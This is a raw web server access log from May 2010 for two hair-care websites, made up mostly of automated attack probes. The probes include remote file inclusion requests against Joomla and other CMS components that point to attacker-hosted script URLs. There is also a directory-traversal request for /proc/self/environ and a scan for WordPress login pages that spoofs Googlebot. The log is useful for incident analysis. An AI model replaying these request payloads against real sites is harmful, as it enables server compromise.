72.18.137.210 - - [31/May/2010:06:17:23 -0700] "GET /logs/access_091221.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:19:01 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [31/May/2010:06:19:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "freehairsecrets.com"
91.212.226.240 - - [31/May/2010:06:19:42 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "freehairsecrets.com"
72.18.137.210 - - [31/May/2010:06:19:46 -0700] "GET /logs/access_091221.log//modules/icontent//include/wysiwyg/spaw_control.class.php?spaw_root=http://www.jordanucc.org/plugins/sh/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [31/May/2010:06:20:30 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "growlonghairfast.com"
91.212.226.210 - - [31/May/2010:06:20:31 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0 ; .NET CLR 2.0.50215; SL Commerce Client v1.0; Tablet PC 2.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:20:41 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:06:21:14 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13983 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
95.169.191.57 - - [31/May/2010:06:21:28 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "growlonghairfast.com"
95.169.191.57 - - [31/May/2010:06:21:29 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:23:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:23:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:23:35 -0700] "GET /logs/access_100104.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:23:35 -0700] "GET /logs/access_100405.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:24:52 -0700] "GET /logs/access_100405.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:24:52 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:24:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:24:52 -0700] "GET /logs/access_100104.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.218.116.164 - - [31/May/2010:06:25:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:06:25:59 -0700] "GET /logs/access_090824.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:27:20 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.145.196 - - [31/May/2010:06:28:33 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.210 - - [31/May/2010:06:30:38 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
91.212.226.210 - - [31/May/2010:06:30:38 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
69.175.83.34 - - [31/May/2010:06:31:01 -0700] "GET /logs/access_100104.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:31:01 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:31:59 -0700] "GET /logs/access_100104.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:31:59 -0700] "GET /logs/access_100405.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.91.137.94 - - [31/May/2010:06:32:57 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.91.137.94 - - [31/May/2010:06:32:57 -0700] "GET /skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.91.137.94 - - [31/May/2010:06:32:57 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://smash6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.153.27.146 - - [31/May/2010:06:35:37 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [31/May/2010:06:35:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [31/May/2010:06:35:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [31/May/2010:06:40:47 -0700] "GET /logs/access_100125.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:42:43 -0700] "GET /logs/access.log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:42:43 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:42:43 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:42:49 -0700] "GET /logs/access_100412.log%20%20////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:42:49 -0700] "GET ///////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:42:49 -0700] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5668 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:44:37 -0700] "GET /logs/access_100412.log%20%20////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:44:37 -0700] "GET ///////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:44:37 -0700] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5668 "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:44:42 -0700] "GET /logs/access_100405.log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:44:42 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.11.114 - - [31/May/2010:06:44:42 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [31/May/2010:06:46:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15271 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:47:03 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [31/May/2010:06:47:03 -0700] "GET ///////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [31/May/2010:06:47:03 -0700] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5668 "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.23.11.114 - - [31/May/2010:06:47:17 -0700] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:49:05 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [31/May/2010:06:49:05 -0700] "GET ///////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 931 "-" "Mozilla/5.0" "www.freehairsecrets.com"
69.175.83.34 - - [31/May/2010:06:49:05 -0700] "GET /logs////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 5668 "-" "Mozilla/5.0" "www.freehairsecrets.com"
94.23.11.114 - - [31/May/2010:06:50:54 -0700] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.153.27.146 - - [31/May/2010:06:51:28 -0700] "GET /logs/access_100125.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://innovativecommunitysolution.com//templates/system/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:52:39 -0700] "GET /logs/access_100412.log////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.10.208.161 - - [31/May/2010:06:52:46 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "growlonghairfast.com"
68.10.208.161 - - [31/May/2010:06:52:51 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "growlonghairfast.com"
68.10.208.161 - - [31/May/2010:06:53:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.freehairsecrets.com"
68.10.208.161 - - [31/May/2010:06:53:08 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "www.freehairsecrets.com"
213.247.51.214 - - [31/May/2010:06:54:02 -0700] "GET /wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:03 -0700] "GET /old/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:03 -0700] "GET /cms/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:04 -0700] "GET /blog/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:04 -0700] "GET /blog_old/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:04 -0700] "GET /blog-old/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:04 -0700] "GET /blog/wp/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:05 -0700] "GET /wp/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:05 -0700] "GET /WP/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:05 -0700] "GET /backup/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:06 -0700] "GET /blog/backup/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:06 -0700] "GET /wordpress/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:06 -0700] "GET /Wordpress/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
213.247.51.214 - - [31/May/2010:06:54:06 -0700] "GET /wordpress2/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
69.175.83.34 - - [31/May/2010:06:54:10 -0700] "GET /logs/access_100412.log////////?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.6.10.110 - - [31/May/2010:07:00:42 -0700] "GET /logs/access_100412.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.6.10.110 - - [31/May/2010:07:00:42 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
89.6.10.110 - - [31/May/2010:07:00:43 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
121.88.4.141 - - [31/May/2010:07:01:28 -0700] "GET /logs/access.log//index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [31/May/2010:07:01:33 -0700] "GET /index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [31/May/2010:07:01:34 -0700] "GET /logs//index.php?option=com_admin&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
89.6.10.110 - - [31/May/2010:07:09:01 -0700] "GET /logs/access_100322.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://freebsd.ucoz.net/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.195.37.176 - - [31/May/2010:07:13:38 -0700] "GET /logs/access_090615.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:36 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:36 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:40 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:27:40 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:47 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:47 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:56 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:56 -0700] "GET /logs/access_100412.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:28:56 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:29:05 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [31/May/2010:07:29:10 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [31/May/2010:07:29:55 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
